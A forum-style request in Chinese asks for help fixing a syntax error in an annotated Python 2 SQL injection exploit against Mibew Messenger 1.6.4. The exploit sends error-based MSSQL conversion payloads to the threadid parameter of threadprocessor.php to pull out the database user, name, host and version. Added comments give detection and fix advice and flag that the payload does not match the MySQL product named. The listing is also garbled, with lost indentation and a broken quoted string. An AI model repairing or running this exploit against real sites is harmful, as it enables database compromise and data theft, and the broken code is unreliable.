我有一个 Python 脚本,是个注入检查的脚本,运行的时候会报错,麻烦高手帮我检查一下语法问题,可以吗?第43行
- #!/usr/bin/python
- #Author: Ucha Gobejishvili
- #Timeline: 2012-08-05 Bug Discovered
- # 2012-08-05 Publicly Disclosed
- #Vendor: Mibew Web Messenger (http://mibew.org/ )
- #Version: Mibew Messenger 1.6.4
- #Demo: http://demo.mibew.org
- #Introduction:
- #Mibew Messenger (also known as Open Web Messenger) is an open-source live
- #support application written in PHP and MySQL. It enables one-on-one chat
- #assistance in real-time directly from your website.
- #Abstract:
- #SQL injection vulnerabilities were discovered in Mibew Messenger v.1.6.4.
- #A SQL injection vulnerability is detected in Mibew Messenger v.1.6.4.
- #The vulnerability allows a remote attacker to execute their own SQL commands
- #on the affected application DBMS. Successful exploitation can result in
- #DBMS, web-server or application compromise.
- # python Mibew.py -p localhost:8080 -t localhost:8500 -d /Patch/
- import sys, httplib, urllib2, urllib, re
- from optparse import OptionParser
# Command-line interface, built with optparse.
#   -p  HTTP proxy as server:port (optional; only used when set)
#   -t  target server as server:port
#   -d  directory path of the application on that server
# All three are stored as plain strings and later concatenated into the
# request URL with no validation.
# NOTE(review): the example path "/coldcal/" in the usage text does not match
# the Mibew advisory in the header; this option block looks carried over from
# a different script -- confirm before relying on the header's claims.
- usage = "./%prog [<options>] -t [target] -d [directory]"
- usage += "\nExample: ./%prog -p localhost:8080 -t localhost:8500 -d /coldcal/"
- parser = OptionParser(usage=usage)
- parser.add_option("-p", type="string",action="store", dest="proxy",
- help="HTTP Proxy <server:port>")
- parser.add_option("-t", type="string", action="store", dest="target",
- help="The Target server <server:port>")
- parser.add_option("-d", type="string", action="store", dest="directory",
- help="Directory path to the CMS")
# Parsing happens at import time, so `options` is a module-level global that
# every function below reads (and setTargetHTTP also writes).
- (options, args) = parser.parse_args()
# banner(): print the tool's fixed text banner to stdout.
# Takes no arguments and returns nothing; Python 2 print statements.
- def banner():
- print "\n\t|----------------------------------------------------------- |"
- print "\t| Mibew Web Messenger SQL Injection Vulnerability|"
- print "\t| |\n"
# Argument-count gate: with fewer than five argv entries (script name plus,
# presumably, the -t and -d option/value pairs) show the banner and the
# optparse help text, then exit with status 1. Only the count is checked,
# not which options were actually supplied.
- if len(sys.argv) < 5:
- banner()
- parser.print_help()
- sys.exit(1)
# getProxy(): open a test connection to options.proxy and build a
# urllib2.ProxyHandler that sends "http" traffic through it.
# Returns: the ProxyHandler, which the caller passes to urllib2.build_opener.
# Both except branches print a message and call sys.exit(1).
# Incident-response note: when -p is used, the source address recorded in the
# target's access log is the proxy's, not the machine running the script.
- def getProxy():
- try:
- pr = httplib.HTTPConnection(options.proxy)
- pr.connect()
- proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
- except(socket.timeout):
- print "\n(-) Proxy Timed Out"
- sys.exit(1)
- except(),msg:
- print "\n(-) Proxy Failed"
- sys.exit(1)
- return proxy_handler
# setTargetHTTP(): make sure options.target starts with the "http://" scheme.
# Compares the first seven characters with 'http://' and prepends the scheme
# when they differ; the module-level options object is modified in place.
# Returns: the resulting options.target string.
# Only plain HTTP is handled here, so the requests are sent unencrypted.
- def setTargetHTTP():
- if options.target[0:7] != 'http://':
- options.target = "http://" + options.target
- return options.target
# getRequest(exploit): send one GET request and return the response body.
#   exploit -- path-and-query suffix, appended to options.target and
#              options.directory to form the URL.
# Returns: the body text read from the response.
# The request goes through an opener built from getProxy() when -p was given,
# otherwise through urllib2.urlopen directly.
# An HTTP error status is not treated as failure: the body of the error
# response is read and returned, because the caller searches the page text
# for a database error message.
# Mitigation note: that only yields anything when the application echoes raw
# database error text to the client; generic error pages with server-side
# logging remove this channel even before the query itself is fixed.
- def getRequest(exploit):
- if options.proxy:
- try:
- proxyfier = urllib2.build_opener(getProxy())
- check = proxyfier.open(options.target+options.directory+exploit).read()
- except urllib2.HTTPError, error:
- check = error.read()
- except socket.error:
- print "(-) Proxy connection failed"
- sys.exit(1)
- else:
- try:
- req = urllib2.Request(options.target+options.directory+exploit)
- check = urllib2.urlopen(req).read()
- except urllib2.HTTPError, error:
- check = error.read()
- except urllib2.URLError:
- print "(-) Target connection failed, check your address"
- sys.exit(1)
- return check
# basicInfo: maps a display label (printed in the result line) to the SQL
# expression whose value the script tries to surface; four entries.
# NOTE(review): user_name(), db_name(), host_name() and @@version are
# Microsoft SQL Server constructs, while the header describes Mibew as a
# PHP/MySQL application. The payload and the advisory text do not match, so
# treat this PoC as unverified against the product it names.
- basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname:
- ':'host_name()','version: \n\n\t':'@@version'}
# basicSploit(info): build the request path and query string.
#   info -- one SQL expression taken from basicInfo.
# Returns: the fixed endpoint /operator/threadprocessor.php with a threadid
# parameter that has a type-conversion expression around `info` appended.
# Detection note: threadid is presumably an integer id, so a request to this
# endpoint whose threadid is not purely numeric is a high-confidence signal
# in web-server or WAF logs.
# Fix note: on the server, cast or validate threadid as an integer, or bind it
# as a query parameter, so that appended text never reaches the SQL parser.
- def basicSploit(info):
- return "/operator/threadprocessor.php?threadid=1+and+1=convert(int," + info + ")--"
# Script entry point: print the banner, normalise the target URL, report the
# proxy if one was given, then send one request per basicInfo entry.
# NOTE(review): indentation and some line breaks were lost when this listing
# was extracted; the code is reproduced exactly as posted.
- if __name__ == "__main__":
- banner()
- options.target = setTargetHTTP()
- print "(+) Exploiting target @: %s" % (options.target+options.directory)
- if options.proxy:
- print "\n(+) Testing Proxy..."
- print "(+) Proxy @ %s" % (options.proxy)
- print "(+) Building Handler.."
# One request per dictionary entry (four in total), so the activity is
# low-volume; detection has to key on request content rather than rate.
- for key in basicInfo:
- getResp = getRequest(basicSploit(basicInfo[key]))
# The marker below is SQL Server's conversion-error wording; a response is
# only reported when the page echoes that database error text back.
- if re.findall("the nvarchar value '", getResp):
- dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type
- int')[0]
- print "\n(!) Found database %s%s" % (key, dbInfo.rstrip())